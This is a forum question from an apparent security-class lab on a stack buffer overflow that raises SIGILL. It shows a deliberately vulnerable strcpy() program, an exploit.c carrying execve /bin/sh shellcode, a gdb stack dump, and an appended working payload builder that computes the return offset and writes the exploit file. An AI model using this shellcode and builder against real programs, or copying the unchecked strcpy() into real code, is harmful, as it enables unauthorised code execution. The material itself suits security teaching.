Getting SIGILL when trying to execute buffer overflow attack
<p>I'm working on the buffer overflow project for my security class. I think I have everything set up right, but when I run it I get:</p>
<pre><code>Program received signal SIGILL, Illegal Instruction.
0x08048500 in main (argc=4854718, argv=0x0804b008) at stack.c:22
22        fread(str, sizeof(char), 517, badfile);
</code></pre>
<p>Here's stack.c:</p>
<pre><code>#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

int bof(char *str)
{
    char buffer[12];

    /* The following statement has a buffer overflow problem */
    strcpy(buffer, str);

    return 1;
}

int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);

    printf("Returned Properly\n");
    return 1;
}
</code></pre>
<p>Here is exploit.c:</p>
<pre><code>#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

char code[] =
    "\x31\xc0"              // xorl  %eax,%eax
    "\x50"                  // pushl %eax
    "\x68\x6e\x2f\x73\x68"  // pushl $0x68732f6e
    "\x68\x2f\x2f\x62\x69"  // pushl $0x69622f2f
    "\x89\xe3"              // movl  %esp,%ebx
    "\x99"                  // cltd
    "\x52"                  // pushl %edx
    "\x53"                  // pushl %ebx
    "\x89\xe1"              // movl  %esp,%ecx
    "\xb0\x0b"              // movb  $0xb,%al
    "\xcd\x80"              // int   $0x80
;

char retaddr[] = "\x70\xF2\xFF\xBF";

void main(int argc, char **argv)
{
    char strr[517];
    strr[0] = 'Z';
    strr[1] = 0;
    strr[2] = '\x00';

    char buffer[517];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(buffer, 0x90, 517);

    /* You need to fill the buffer with appropriate contents here */
    //memcpy(buffer, "EGG=", 4);
    memcpy(buffer, code, 24);
    memcpy(buffer+20, retaddr, 4);
    memcpy(buffer+24, "\x00\x00\x00\x00", 4);

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
}
</code></pre>
<p>Here is the stack at runtime:</p>
<pre><code>Starting program: /home/john/stack

Breakpoint 1, bof (
    str=0xbffff2b7 "1\300Phn/shh//bi\211\343\231RS\211\341p\362\377\277") at stack.c:13
13        strcpy(buffer, str);
(gdb) x/12xw $esp
0xbffff270:     0x00000205      0xbffff298      0x004a13be      0x0804b008
0xbffff280:     0xbffff2b7      0x00000205      0xb7fef6c0      0x00584ff4
0xbffff290:     0x00000000      0x00000000      0xbffff4c8      0x0804850f
(gdb) s
14        return 1;
(gdb) x/12xw $esp
0xbffff270:     0xbffff284      0xbffff2b7      0x004a13be      0x0804b008
0xbffff280:     0xbffff2b7      0x6850c031      0x68732f6e      0x622f2f68
0xbffff290:     0x99e38969      0xe1895352      0xbffff270      0x08048500
(gdb) c
Continuing.
</code></pre>
<p>Any idea why I'm getting SIGILL?</p>
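An added example, not part of the question above and not the course's lab code: a badfile builder for this kind of strcpy() overflow that works out the return-address offset from addresses like those in the gdb dump (the buffer in bof starts at 0xbffff284 and the slot holding main's return address 0x0804850f is at 0xbffff29c, 24 bytes later) and refuses layouts that cannot survive strcpy(): a return-address slot that overlaps the shellcode bytes, a return address that does not land on the NOP sled, or a NUL byte anywhere before the last byte the copy has to deliver, since strcpy() stops at the first NUL. The shellcode bytes are the ones from exploit.c; the function names, the layout (sled, return slot, sled, shellcode at the end of the 517 bytes) and the sample addresses are my own choices, and the code assumes a 32-bit x86 target without ASLR or a non-executable stack, as in the lab setup.

```c
/* Added example (not from the question): payload builder with layout checks
 * for a strcpy()-based stack overflow. Addresses come from the gdb dump in
 * the question; function names and layout are the author's own choice.
 * Assumes 32-bit x86, little-endian, no ASLR/NX (the lab target). */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PAYLOAD_LEN 517   /* stack.c reads exactly this many bytes */
#define NOP 0x90

/* Same 24 bytes as the shellcode in exploit.c; it contains no NUL. */
static const unsigned char shellcode[] =
    "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69"
    "\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
#define SHELLCODE_LEN (sizeof(shellcode) - 1)

/* Distance from the start of the overflowed buffer to the saved return
 * address, computed from two addresses gdb printed (0xbffff284 and
 * 0xbffff29c in the dump above give 24). */
size_t ret_offset(uint32_t buffer_addr, uint32_t ret_slot_addr)
{
    return (size_t)(ret_slot_addr - buffer_addr);
}

/* Layout: NOP sled, new return address at ret_off, more sled, shellcode at
 * sc_off (after the return slot). Returns 0 on success, -1 when the layout
 * cannot work through strcpy():
 *   - shellcode starts before the end of the return slot (they overlap),
 *   - ret_addr does not land on the sled between the two,
 *   - a NUL byte sits before the last byte strcpy() has to copy
 *     (strcpy stops at the first NUL; nothing after it reaches the stack). */
int build_payload(unsigned char *out, size_t out_len, uint32_t buffer_addr,
                  size_t ret_off, size_t sc_off, uint32_t ret_addr)
{
    size_t i, needed;
    uint32_t land;

    if (ret_off + 4 > out_len || sc_off + SHELLCODE_LEN > out_len)
        return -1;                       /* does not fit in the file */
    if (sc_off < ret_off + 4)
        return -1;                       /* shellcode would overlap the slot */
    land = ret_addr - buffer_addr;       /* offset the CPU will jump to */
    if (land < ret_off + 4 || land >= sc_off)
        return -1;                       /* misses the sled */

    memset(out, NOP, out_len);
    out[ret_off + 0] = (unsigned char)(ret_addr & 0xff);         /* LE */
    out[ret_off + 1] = (unsigned char)((ret_addr >> 8) & 0xff);
    out[ret_off + 2] = (unsigned char)((ret_addr >> 16) & 0xff);
    out[ret_off + 3] = (unsigned char)((ret_addr >> 24) & 0xff);
    memcpy(out + sc_off, shellcode, SHELLCODE_LEN);

    needed = sc_off + SHELLCODE_LEN;     /* last byte strcpy() must deliver */
    for (i = 0; i < needed; i++)
        if (out[i] == 0)
            return -1;                   /* strcpy() would stop here */
    return 0;
}

int main(void)
{
    unsigned char buf[PAYLOAD_LEN];
    uint32_t buffer_addr = 0xbffff284u;                      /* &buffer, gdb */
    size_t ret_off = ret_offset(buffer_addr, 0xbffff29cu);   /* = 24 */
    size_t sc_off = PAYLOAD_LEN - SHELLCODE_LEN;             /* shellcode last */
    FILE *f;

    /* jump 100 bytes into the buffer: past the return slot, inside the sled */
    if (build_payload(buf, PAYLOAD_LEN, buffer_addr, ret_off, sc_off,
                      buffer_addr + 100) != 0) {
        fprintf(stderr, "layout rejected\n");
        return 1;
    }
    f = fopen("badfile", "wb");
    if (f == NULL)
        return 1;
    fwrite(buf, 1, PAYLOAD_LEN, f);
    fclose(f);
    return 0;
}
```

The two numbers that matter are taken from the debugger rather than guessed: the return-slot offset comes from subtracting the buffer address from the address of the saved return value, and the jump target is chosen to land between the return slot and the shellcode so the sled carries execution forward. Placing the shellcode at the far end of the 517 bytes keeps it well clear of the return slot and gives the sled as much room as possible.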